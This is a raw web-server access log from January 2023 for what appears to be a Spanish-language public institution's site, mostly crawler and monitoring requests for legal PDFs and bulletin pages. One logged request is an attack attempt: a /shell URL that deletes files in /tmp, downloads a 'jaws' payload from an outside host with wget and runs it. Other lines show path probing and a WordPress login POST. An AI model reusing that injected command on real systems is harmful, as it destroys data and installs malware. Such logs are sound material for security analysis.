201.245.192.253 - - [06/Jan/2023:04:19:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43923
114.119.145.183 - - [06/Jan/2023:04:20:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7438.pdf HTTP/1.1" 200 356368
216.245.221.92 - - [06/Jan/2023:04:21:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:04:20:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:04:22:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:04:20:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52453
114.119.146.111 - - [06/Jan/2023:04:23:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7323.pdf HTTP/1.1" 200 424031
66.249.73.127 - - [06/Jan/2023:04:23:33 -0500] "-" 408 -
40.77.167.21 - - [06/Jan/2023:04:24:15 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Ficha-zarigueya.jpg HTTP/1.1" 200 681085
114.119.143.39 - - [06/Jan/2023:04:24:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7276.pdf HTTP/1.1" 200 116188
114.119.137.195 - - [06/Jan/2023:04:25:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7129.pdf HTTP/1.1" 200 274175
216.245.221.92 - - [06/Jan/2023:04:26:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:04:27:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:04:25:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.155.54 - - [06/Jan/2023:04:27:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6561.pdf HTTP/1.1" 200 277454
172.22.2.4 - - [06/Jan/2023:04:26:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52453
190.77.14.192 - - [06/Jan/2023:04:29:13 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+heylitimysun.top/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
201.245.192.253 - - [06/Jan/2023:04:29:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42222
201.245.192.253 - - [06/Jan/2023:04:29:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43923
114.119.155.54 - - [06/Jan/2023:04:29:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6182.pdf HTTP/1.1" 200 642075
216.245.221.92 - - [06/Jan/2023:04:31:16 -0500] "HEAD / HTTP/1.1" 200 -
114.119.159.33 - - [06/Jan/2023:04:31:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6023.pdf HTTP/1.1" 200 938657
201.245.192.253 - - [06/Jan/2023:04:32:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:04:31:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.129.9 - - [06/Jan/2023:04:34:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5738.pdf HTTP/1.1" 200 98195
172.22.2.4 - - [06/Jan/2023:04:32:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
66.249.79.121 - - [06/Jan/2023:04:35:17 -0500] "-" 408 -
40.77.167.33 - - [06/Jan/2023:04:35:48 -0500] "GET /Publicaciones/2022EE134389.pdf HTTP/1.1" 404 228
216.245.221.92 - - [06/Jan/2023:04:36:16 -0500] "HEAD / HTTP/1.1" 200 -
114.119.140.29 - - [06/Jan/2023:04:36:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4993.pdf HTTP/1.1" 200 746411
201.245.192.253 - - [06/Jan/2023:04:37:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:04:37:26 -0500] "GET /BLA/boletinlegal/actuator/health HTTP/1.1" 404 1018
45.33.80.237 - - [06/Jan/2023:04:37:34 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
45.33.80.237 - - [06/Jan/2023:04:37:34 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
45.33.80.237 - - [06/Jan/2023:04:37:34 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
114.119.133.247 - - [06/Jan/2023:04:38:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4918.pdf HTTP/1.1" 200 760787
172.22.2.4 - - [06/Jan/2023:04:37:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:04:39:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42222
201.245.192.253 - - [06/Jan/2023:04:39:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43923
172.22.2.4 - - [06/Jan/2023:04:38:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
66.249.73.100 - - [06/Jan/2023:04:40:12 -0500] "-" 408 -
114.119.149.195 - - [06/Jan/2023:04:40:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3614.pdf HTTP/1.1" 200 526277
216.245.221.92 - - [06/Jan/2023:04:41:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Jan/2023:04:42:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
114.119.130.13 - - [06/Jan/2023:04:43:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3459.pdf HTTP/1.1" 200 522009
172.22.2.4 - - [06/Jan/2023:04:43:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:04:44:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
216.245.221.92 - - [06/Jan/2023:04:46:16 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.53 - - [06/Jan/2023:04:46:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3362.pdf HTTP/1.1" 200 521343
201.245.192.253 - - [06/Jan/2023:04:47:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
185.119.81.105 - - [06/Jan/2023:04:48:03 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [06/Jan/2023:04:48:04 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
66.249.73.127 - - [06/Jan/2023:04:49:03 -0500] "-" 408 -
172.22.2.4 - - [06/Jan/2023:04:49:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.155.13 - - [06/Jan/2023:04:50:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3016.pdf HTTP/1.1" 200 299266
216.245.221.92 - - [06/Jan/2023:04:51:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:04:50:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55272
201.245.192.253 - - [06/Jan/2023:04:52:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44088
172.22.2.4 - - [06/Jan/2023:04:52:35 -0500] "GET /BLA/boletinlegal/api/jsonws/ HTTP/1.1" 404 1018
172.22.2.4 - - [06/Jan/2023:04:52:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [06/Jan/2023:04:53:58 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 200 41984
114.119.157.221 - - [06/Jan/2023:04:54:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2874.pdf HTTP/1.1" 200 576957
172.22.2.4 - - [06/Jan/2023:04:55:08 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2003%20del%2026%20de%20Julio%20de%202016.pdf HTTP/1.1" 304 -
216.245.221.92 - - [06/Jan/2023:04:56:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Jan/2023:04:55:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [06/Jan/2023:04:56:53 -0500] "-" 408 -
